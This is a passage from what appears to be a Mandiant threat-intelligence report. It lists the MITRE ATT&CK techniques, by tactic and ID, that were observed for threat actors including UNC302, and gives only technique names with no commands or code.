* T1016 System Network Configuration Discovery
* T1049 System Network Connections Discovery
* T1082 System Information Discovery
* T1083 File and Directory Discovery

Command and Control
* T1095 Non-Application Layer Protocol
* T1105 Ingress Tool Transfer
* T1572 Protocol Tunneling
* T1573.002 Asymmetric Cryptography

Execution
* T1059 Command and Scripting Interpreter
* T1059.004 Unix Shell

Persistence
* T1136.001 Local Account

Impact
* T1531 Account Access Removal

Credential Access
* T1003.008 /etc/passwd and /etc/shadow

Resource Development
* T1608.003 Install Digital Certificate

Mandiant has observed UNC302 use the following techniques:

Initial Access
* T1133 External Remote Services
* T1189 Drive-by Compromise
* T1190 Exploit Public-Facing Application

Collection
* T1213 Data from Information Repositories
* T1560 Archive Collected Data
* T1560.001 Archive via Utility

Persistence
* T1505.003 Web Shell

Defense Evasion
* T1027 Obfuscated Files or Information
* T1036 Masquerading
* T1070.004 File Deletion
* T1112 Modify Registry
* T1134 Access Token Manipulation
* T1497 Virtualization/Sandbox Evasion

Impact
* T1529 System Shutdown/Reboot

Execution
* T1059.003 Windows Command Shell
* T1059.005 Visual Basic
* T1203 Exploitation for Client Execution

Discovery
* T1012 Query Registry
* T1016 System Network Configuration Discovery
* T1057 Process Discovery
* T1082 System Information Discovery
* T1083 File and Directory Discovery
* T1518 Software Discovery

Credential Access
* T1003 OS Credential Dumping

Lateral Movement
* T1021.001 Remote Desktop Protocol

Resource Development
* T1583.003 Virtual Private Server
* T1584 Compromise Infrastructure

Command and Control
* T1071.001 Web Protocols
* T1071.004 DNS
* T1095 Non-Application Layer Protocol

© Copyright 2024 Mandiant. All rights reserved.